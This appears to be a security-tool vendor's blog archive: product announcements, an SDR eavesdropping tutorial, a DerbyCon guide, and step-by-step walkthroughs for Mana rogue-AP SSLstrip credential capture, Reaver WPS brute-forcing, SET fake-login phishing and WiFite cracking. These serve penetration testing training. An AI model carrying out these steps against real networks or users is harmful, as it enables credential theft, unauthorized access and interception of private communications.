Posts

Introducing the Pwn Pad 4: the latest Pwnie mobile sensor for wired, wireless and Bluetooth device detection, classification, and penetration testing

We’re excited to announce pre-sale of the Pwn Pad 4, a commercial-grade security tablet designed for remote security assessment. The Pwn Pad 4 combines a portable security detection and pen-testing tool with a powerful enterprise security platform.  In addition, even the pentesting abilities have some exciting new features: with Kali Rolling and Blue Hydra (a Pwnie-developed capability), it’s the only pentesting tablet with Bluetooth capabilities that offers energy efficient and conventional Bluetooth detection and fingerprinting.

The Pwn Pad 4 features the following enhanced capabilities:

  • Blue Hydra, An industry first from Pwnie Express, the Pwn Pad 4 now includes Blue Hydra, the first device discovery software capable of detecting low power and classic Bluetooth devices.
  • Portable Pen-Testing Doubling as Threat Detection Sensors: The tablet is completely integrated with Pwnie Express’ Pwn Pulse SaaS platform for real-time wired and wireless, BYOD and IoT threat detection. This allows security professionals to leverage the versatile pen testing capabilities of a portable pad andwith the centralized visibility and historical records of enterprise data.
  • Kali Linux Rolling Distribution: The tablet comes prepackaged with the latest Kali Rolling edition, which includes an arsenal of tools and scripts for the hands-on, on-the-go cyber security professional.
  • Enhanced Configuration and Setup: The Pwn Pad 4 is more user-friendly than its earlier counterparts, with a consumer-like setup and configuration wizard that allows customers to streamline the initial implementation, upgrading and use of non-Pwnie Android apps.  

The Pwn Pad 4 is now available for pre-sale and will be generally available on June 1.  For more information, please visit  or contact sales@pwnieexpress.com or call (855) 793-1337.

zANTI 2.0 on Pwnie Devices

Both the paid and community editions of the Pwn Pad and Pwn Plug currently include dSploit: an extremely comprehensive security suite that can map networks, scan for vulnerabilities, crack network passwords, and even launch sophisticated Man-In-The-Middle attacks, all from a slick and intuitive graphical user interface. Licensed as free and open source software under the GPLv3, it was a natural addition to the stock firmware on the Pwn Pad and Phone.

But if you’ve been trying to use dSploit on your Pwn device recently, you may have been in for a surprise. At the end of 2014, principle dSploit developer Simone Margaritelli announced he was officially merging his project with zANTI from Zimperium. Running dSploit now throws up a message about upgrading to the free of charge zANTI 2.0.

 

Upgrading to zANTI

When you try and start dSploit, it will immediately throw up a message about updating to the latest version. You can say no and continue to use the version of dSploit that came with the device (which will continue to work as normal), and even disable the update check if you don’t want to see this message anymore. If you continue to use dSploit, be aware that it will no longer be getting updates. While that isn’t a problem now, there is no telling what will happen in the future. In the absolute best case, it will be behind the curve, and in the worst, it may stop working in future versions of Android.

Available

 

But let’s assume that you’re onboard with the change from dSploit to zANTI, and you tap “Yes”. This will begin the file download which you can check by pulling down the notification panel. Once the zANTI package has downloaded, you can install it just like any other side-loaded Android application.

It’s worth mentioning that installing zANTI won’t actually remove dSploit from your device, the two applications are completely separate and can both be installed at the same time.

Note: If you are having problems with the automatic update or would otherwise just jump right to zANTI, you can download the APK directly here.

 

Starting zANTI

The first time you start zANTI, you’ll see a prompt asking if you want to give it root-level permissions. Due to the advanced nature of the tools and techniques zANTI makes use of, there’s no way to use many of its features without agreeing by tapping “Grant”.

SuperUser Request

You’ll then be asked if you are a Community or Registered user. You don’t need to register to use the application, so you can simply stay on the “Community” tab, check the box next to “I accept Zimerium’s EULA”, and then tap “Start Now”. On the following screen you’ll be asked if you want to register, but you can simply touch “Skip” to continue.

Pwnie1

There are a few hints and tips that zANTI gives you along with a couple of screenshots you need to move through, and then finally you will be asked if you are authorized the perform penetration testing on the network.

Pwnie2

 

 

Quick Overview

The main screen in zANTI is the network map, which will begin populating with data as soon as you start the application.  This will show you pertinent information about all the discovered hosts in your network, such as IP address, MAC, and open ports. Given enough time to complete its scan, zANTI will even list device manufacturer and operating system best-guess for each entry. A full network scan can take awhile, so be patient. There’ll be a sound and notification when it’s complete, so you won’t miss it.

Zanti3

Selecting any one of the entries on this main list will take you to the individual page for that device. From here you can enter in some notes about this device, perform a deeper Nmap scan, and launch exploits and vulnerabilities against it.

Screen Shot 2015-02-18 at 1.41.34 PM

Selecting one of these exploits, in this case Main-In-The-Middle attack, you can see the wealth of options zANTI makes available to the operator. For MITM especially, there are some very impressive options to do things like intercept and replace data in real-time on its way to the targeted host.

zANTI 3

 

cSploit

While it isn’t up to the standard zANTI has set, there is an active fork of dSploit known as cSploit that was broken off of the main project when the merge with Zimperium was announced. For those who may want to hold off on jumping on the zANTI bandwagon, cSploit is probably the best option short of continuing to use the unmaintained final version of dSploit.

 

Mobile SDR with Pwnie Mobile Devices

In the context of pentesting, “wireless” is generally taken to mean WiFi, and possibly Bluetooth. That’s not because those are the only two wireless technologies deployed in the wild, but because these are the primary types of wireless communications that testers can get access to. The economies of scale push the cost of high-end WiFi and Bluetooth radios down to the point that even amateur pentesters can afford them, but traditionally, the same has not been true for other forms of wireless.

But a chance discovery a few years ago revealed that cheap USB TV tuners based on the Realtek RTL2832U chipset could be tuned into frequencies well outside of their advertised capability. With just a bit of driver modification, the hacking community got their hands on a highly capable software defined radio (SDR) that could be purchased for as low as $10 from some vendors.

With SDR, instead of having expensive radio equipment to receive and decode each specific wireless technology, one radio can be tuned into an arbitrary frequency, and software can do the decoding. This opens up a huge swath of the radio spectrum; everything from pager transmissions to satellite transmissions can be received with inexpensive hardware and open source software.

Even better, with powerful mobile devices like the Pwn Pad and Pwn Phone, it’s now possible to take SDR on the go. Penetration testing no longer has to be limited to WiFi and Bluetooth, but can include things such as two-way radio communications and pager messages.

Supported Hardware

TV tuners based on the RTL2832U chipset are fairly common, and a number of online retailers stock them specifically for SDR use. Searching eBay or Amazon for “RTL-SDR” will bring up plenty of hardware choices.

The RTL-SDR project website maintains a basic compatibility list of devices known to work, though it’s by no means exhaustive. A somewhat more detailed compatibility list, maintained by the community, is available on Reddit.

Software

Currently, the best SDR software available for Android is “SDR Touch”, developed by Martin Marinov. SDR Touch will work out of the box on both the Pwn Phone and Pwn Pad, all you need is the included USB On-The-Go (OTG) cable and a supported RTL device.

After your hardware is connected, open up SDR Touch and tap the On/Off button at the top right of the screen. That will show the following message, confirming you want to let SDR Touch communicate with the hardware. Selecting the checkbox will prevent you from seeing this dialog every time you start the app.

SDR1

Operation

SDR Touch is a full featured software defined radio, allowing you to tune the radio to whatever frequency you wish, visualize received signals with a “waterfall” spectrum analyzer, and even decode a number of protocols automatically.

Dragging the spectrum analyzer in the center allows you to adjust the frequency you’re currently listening to, and pinching will let you zoom in to make fine adjustments. Signals which are stronger than the background noise (which is to say, something that’s likely to be an interesting transmission) will show up as large spikes in the upper region of the display and colored tracks on the bottom of the display.

In the following image, the radio is tuned to 462.583 MHz, listening in on a transmission from a standard handheld walkie talkie.

SDR2

While SDR Touch is running you’ll be hearing live audio as it’s received from the radio hardware. When tuned to a transmission such as this, you’ll be able to hear whatever the users are saying as if you had your own walkie talkie. You can even press the “Record” button on the bottom right of the screen to save the audio.

Scratching the Surface

With the appropriate hardware and working knowledge of SDR Touch under your belt, a whole new world is opened up. Searching around the spectrum with an eye out for strong signals can uncover some very surprising things.

For example, in many areas pager networks are still operating in the 900 MHz band. Pager broadcasts by their nature tend to be very strong, and will be easy to identify by both the bright wide track they will leave on the waterfall, and their distinctive sound (not unlike an old analog modem). Connecting the Pwn Pad or Phone’s headphone jack to a computer’s audio input will allow using advanced software to process digital signals such as these, and can allow recovering the plaintext content of pager messages.

One simply can’t overstate just how much new territory is opened up by mastering SDR techniques. As we become increasingly reliant on wireless technology, having the tools and knowledge to discover and interpret wireless signals will become indispensable for the pentester.

Bypassing HSTS SSL with the Mana Toolkit

Anyone who’s attempted to use Moxie Marlinspike’s SSLstrip against recent browsers has no doubt run into HTTP Strict Transport Security (HSTS), a mechanism by which a website is able to inform the browser if it’s supposed to be secured with SSL. This fixes the key problem with previous SSL implementations (and what made SSLstrip possible); the fact that the user had to know ahead of time if the site they were visiting was using encryption.

When a user running a recent version of Chrome or Firefox visits an SSL secured site which has been forced down to plain HTTP with SSLstrip, it not only fails, but goes as far as informing the user their current Internet connection is potentially being tampered with by a third party.

But thanks to the recently released “Mana Toolkit”, the SSLstrip technique is once again viable on modern operating systems and browsers. Combining an updated version of SSLstrip, some DNS trickery, and a turn-key rogue AP, Mana is an extremely effective solution for covertly capturing WiFi traffic.

 

Running Mana

Mana has just recently been added to the Kali Linux repositories, which means it’s automatically available to Pwnie devices running Pwnix by simply running:

 

apt-get install mana-toolkit

 

This will pull in quite a few dependencies required to get Mana running, and will drop you back to the command line once finished.

From there, navigate to the Mana directory located at /usr/share/mana-toolkit, and then enter the directory named run-mana. Here you’ll find a number of scripts used to control how Mana operates.

Mana

 

Of the available scripts, the following will be the most useful under normal circumstances:

start-nat-full.sh

Starts the rogue AP, routes client requests to the Ethernet network, and enables all of the tools included in Mana will. This is the script you want to get Mana working as quickly as possible.

start-nat-simple.sh

Starts the rogue AP, but none of the tools. Use this script if you want to deploy your own tools against targets.

start-noupstream.sh

Starts roque AP without Internet connection, complete with fake captive portal login for attempting to capture victim credentials even if you’re offline.

The most common usage will be to run the full Mana suite, so we’ll look at that. While you can manually edit the configuration files under /etc/mana-toolkit, it isn’t necessary to get Mana up and running. Running the “start-nat-full.sh” script will launch Mana and start flooding the terminal with status info:

Mana2

 

Mana will now be advertising a wireless network named “Internet”, as well as attempting to spoof other networks as it sees SSID broadcasts from clients searching for previously connected access points.

 

Compatible Sites

Mana includes the necessary configuration files to capture credentials on a number of popular sites, but of course not all are currently supported. Browsing the source via their official GitHub page shows Mana is already setup to capture login credentials from Facebook, Google, and Apple:

https://github.com/sensepost/mana/tree/master/apache/etc/apache2/sites-available

As Mana is still in development, additional sites and services are still being added. In the meantime, the developers suggest using the already available code as a template to customize your Mana installation for your specific needs and targets.

 

Reviewing Captured Data

The main Mana script dumps out a rather overwhelming amount of continually updating information, and it can be very difficult to interpret it as everything goes by. It’s therefore easier to manually check the SSLstrip logs to look for captured credentials than trying to read them from the script’s output.

The main SSLstrip log file is located at /var/lib/mana-toolkit/sslstrip.log, which holds all the previously SSL protected data that Mana managed to capture. Searching this file for usernames and passwords (try using grep to search for terms such as “pass”) can uncover some extremely interesting information.



New Call-to-action

WPS Cracking with Reaver

We’ve previously covered how ineffectual WEP encryption is for securing a wireless network, showing that the Pwn Plug R3 can easily break into a WEP network in less than one minute. But considering how old WEP is, that shouldn’t really come as much of a surprise. Most networks will now be running the much more robust WiFi Protected Access (WPA), with WEP running mainly on the older systems that haven’t been updated or maintained.

But while it’s not as trivial as breaking into a WEP network, WPA is not completely infallible. Here we will take a look at one of the methods used to crack into a WPA network, and some of the pitfalls you may encounter.

 

WPS Pin Attack

An often overlooked feature on many WiFi routers and access points is WiFi Protected Setup (WPS). This is a convenient feature that allows the user to configure a client device against a wireless network by simultaneously pressing a button on both the access point and the client device (the client side “button” is often in software) at the same time. The devices trade information, and then set up a secure WPA link.

On the surface, this is a very clever feature. It allows less savvy users to establish a secure connection between their devices quickly and easily, and as it requires physical access to the hardware, it would seem relatively secure.

But a tool called Reaver has been designed to brute-force the WPA handshaking process remotely, even if the physical button hasn’t been pressed on the access point.

While some newer devices are building in protection against this specific attack, the Reaver WPS exploit remains useful on many networks in the field.

Note: To be clear, WPS is the vulnerable system in this case, not WPA. If a network has WPS disabled (which they should, given the existence of tools such as this), it will be immune to the following attack.

 

Finding a Network

If you’ve read the previous tutorial on cracking into a WEP network, you’ll recognize the command used to get the hardware into monitor mode:

 

airmon-ng start wlan0

 

From here you could use airodump-ng to look for networks, but Reaver actually includes its own tool for finding vulnerable WPS implementations which is much more straightforward. To start it, run the following command:

 

wash -i mon0

 

The output will look something like this:

WPS Cracking

This shows two networks which are, at least in theory, vulnerable to the WPS brute force attack Reaver uses. Note the “WPS Locked” column; this is far from a definitive indicator, but in general, you’ll find that APs which are listed as unlocked are much more likely to be susceptible to brute forcing. You can still attempt to launch an attack against a network which is WPS locked, but the chances of success aren’t very good.

 

Launching Reaver

Once you’ve found a network you wish to run the attack against, operating Reaver is very straightforward. The basic command needs only the local interface, channel, and ESSID to be specified. The command to launch Reaver against the “linksys” network above would look like this:

 

reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv

 

The only part of the above command that might not be immediately obvious is “-vv”; this enables verbose output which greatly helps when trying to gauge how well Reaper is (or is not) progressing.

Once you’ve started Reaver, you’ll start seeing output like this:

Reaver

This output shows that WPS pins are successfully being tried against the target (here we see 12345670 and 00005678 are being tested), and Reaver is operating normally.

 

Advanced Options

Ideally, the basic command works and the attack progresses as expected. But in reality, different manufacturers have been trying to implement protections against Reaver-style attacks, and additional options may be required to get the attack moving.

As an example, the following command adds a few optional switches that can help to get Reaver working on more picky devices:

 

reaver -i mon0 -c 6 -b 00:23:69:48:33:95  -vv -L -N -d 15 -T .5 -r 3:15

 

The core command hasn’t changed, the additional switches just change how Reaver behaves:

-L

Ignore locked WPS state.

-N

Don’t send NACK packets when errors are detected.

-d 15

Delay 15 seconds between PIN attempts.

-T

Set timeout period to half a second.

-r 3:15

After 3 attempts, sleep for 15 seconds

 

This is by no means an exhaustive list of Reaver options, but it gives an idea on what kind of things you might want to try.

 

Attack Duration

Even under ideal conditions, Reaver can take a very long time to complete its run. There is an element of chance involved, the brute forcing could theoretically discover the PIN very quickly, but in general it is going to take many hours to even make a dent in the possible pool of PINs.

Luckily, Reaver keeps a progress log file automatically, so you can stop the attack at any time and resume whenever it’s convenient. Spending a few hours a day running Reaver against the same network should uncover its PIN and through that the WPA passphrase…eventually.


Learn More About Rogue Devices

Derby Con 4.0 – Guide to Louisville

Derby Con 4.0 will be September 24-28 in Louisville Kentucky, and Pwnie Express will be on hand September 25-26 (and we might have stickers), so stop by the booth and say hello! We’ll be having a drawing for a free red Pwn Phone, one of only a few specially-made ones. In order to enter the drawing, stop by the booth and drop a business card.

Win a red Pwn Phone

In addition, two of the Pwnies will be leading a workshop called “Make Your Own Pwn Phone”  on Friday, Sept. 26 from 2:00pm – 4:00pm where you can, well, make your own Pwn Phone.  We will not, however, be providing phones — so remember to bring your own Nexus 5 or Nexus tablet if you want to participate. In addition, we will be selling the “Pwn Pad DIY kit” and the “Pwn Pro DIY kit;” full kits with all the adapters, case, velcro, etc. at the booth.

Though Derby Con is the reason to go, Louisville is also a great place to explore: in addition to the amazing food and the Kentucky Derby, Louisville is the home of Bourbon and some pretty great bars. Aside from the “standard” touristy sites, check out Louisville’s Mini Maker Faire on Saturday, September 27th and the local hackerspace LVL 1.

Start your tour of Louisville with the standard touristy sites on Main Street and Museum Row: for all you boxing fans, there’s the Muhammed Ali Center, a museum dedicated to the life and vision of Muhammed Ali. Those who prefer baseball can check out the Louisville Slugger Museum, a museum dedicated to the “Louisville Slugger” baseball bat and baseball history in general. Though Slugger field might not have games this time of year, the field’s gastropub Against the Grain is always open, with a great selection of craft brew and (word has it) some of the best beer cheese around. The 21C, a hotel voted #1 Hotel in the South, is also on the row and has an incredible contemporary art museum.

If music and food are more your style, Fourth Street Live is a great destination for restaurants, bars, lounges, and a food court with some of the best BBQ in the nation. For those willing to go a bit off the beaten path, Bardstown Road is a quirky, offbeat foil to the more touristy Fourth Street Live. Bardstown Road includes the Phoenix Hill Tavern, the oldest nightclub in the city, and comedy club Comedy Caravan (featuring the Laughing Derby).

Of course, Churchill Downs, home of the Kentucky Derby, will be hosting races during the weekend of Derby Con. Check out their calendar of events to find races and other happenings. More of historical Louisville can be found at the Seelbach Hilton, a hotel featured in Fitzgerald’s Great Gatsby and one of the places where he wrote the book. Old Louisville has the country’s largest collection of Victorian architecture, and the Bourbon Trail is a historical icon of a slightly different sort.

Hope to see you soon!

Stealing Credentials with Fake Login Pages

In previous entries, we’ve seen how client devices can be tricked into connecting to a rogue access point, giving the person running the AP full control over the client’s Internet access. The concept is fairly simple: present the client device with a WiFi network that looks like what it is expecting and the device will connect without a fuss.

As it turns out, humans can be tricked just as easily. As a general rule, people are trusting; as long as things look more or less as they expect them to, most users will continue on with their normal routine, blissfully unaware that they might be the victim of a sophisticated attack.

In this post, we’ll build on the EvilAP attack by presenting victims a cloned version of the Facebook login page in an effort to capture their login credentials. Facebook is used only as an example here, the same method can be used with any website that features a login dialog.

Note: The following assumes you’ve already configured an EvilAP and are ready for clients to connect. If you’d like to read up on how to launch an EvilAP,take a look at “EvilAP: A Practical Example”.

Social Engineering Toolkit

The Social Engineering Toolkit (SET) is a collection of tools designed to automate a wide array of exploits: everything from generating malicious QR codes to programming a microcontroller to act as an attack vector. In this particular example, we’ll be using the “Site Cloner” function, which will duplicate any website the operator chooses and capture information the victim sends to it.

To launch SET, tap its icon under the “Attack Tools” directory.

etter

SET has its own menu system which you can navigate through by entering the numbers corresponding to the selection you wish to make.

SEtmen

First, select “Social-Engineering Attacks” by entering in the number 1, then number 2 for “Website Attack Vectors”.

select

Then enter 3 for “Credential Harvester Attack Method”, and finally, enter 2 for “Site Cloner”. You’ll then be asked for the IP address of the EvilAP, which is 192.168.7.1, followed by the URL of the site you want to clone.

clone

All that’s left to do now is wait for the results to scroll across the screen. As victims connect to the EvilAP and try to login to Facebook (or whatever site you selected to clone), their login credentials will show up in red.

gotahit

 

 

How to Use WiFite on the Pwn Pad

This video covers how to use WiFite on the Pwn Pad. Launch WiFite (in the wireless tools folder), the set it/forget it of wireless pentesting apps. Select the TPLink adapter (as it supports packet injection), an adapter that comes with the Pwn Pad, and automatically set it into wireless mode to find and list access points. If you see anything with WEP, Wifite will run through 6 different types of attacks, usually cracking the authentification once every 10,000 packets (often less than two minutes). To crack WPA2, you need to press the Volume down key on the Pwn Pad, followed by the letter C (Control C) to select the number of the access point you’re looking to crack. Reaver (PIN) attack will be launched, which will usually take about 8-10 hours, then attempt to acquire 4-way handshake, and take the bsid and utilize aircrack-ng to try to discern what the pass-raise may be. By default, we don’t try to do the dictionary attack (as it requires quite a bit of battery). Instead, we recommend that you go to the applications folder and run the “captures dump” application with a USB stick, to copy the capture file directly to that memory stick, which you can then use on a laptop or desktop with Kali Linux. In this particular case, the key was found in the dictionary file. Once you connect to the access point with the key layered, you can switch to a different type of attack.

For more information, go to co.google.com/p/wifite or www.aircrack-ng.org.

 

How to Use Nmap on the Pwn Pad

This video demonstrates using nmap on the Pwn Pad, both with the one-touch functionality and from the command-line. The video covers the various adapters that can be used with the Pwn Pad and how to choose which one you are using: tplink, trendnet USB ethernet adapter, the onboard Nexus adapter, or EvilAP. Nmap will ascertain the IP address and scan the class-c of that network, and you can then run a common service scan or use nmap’s other functionalities.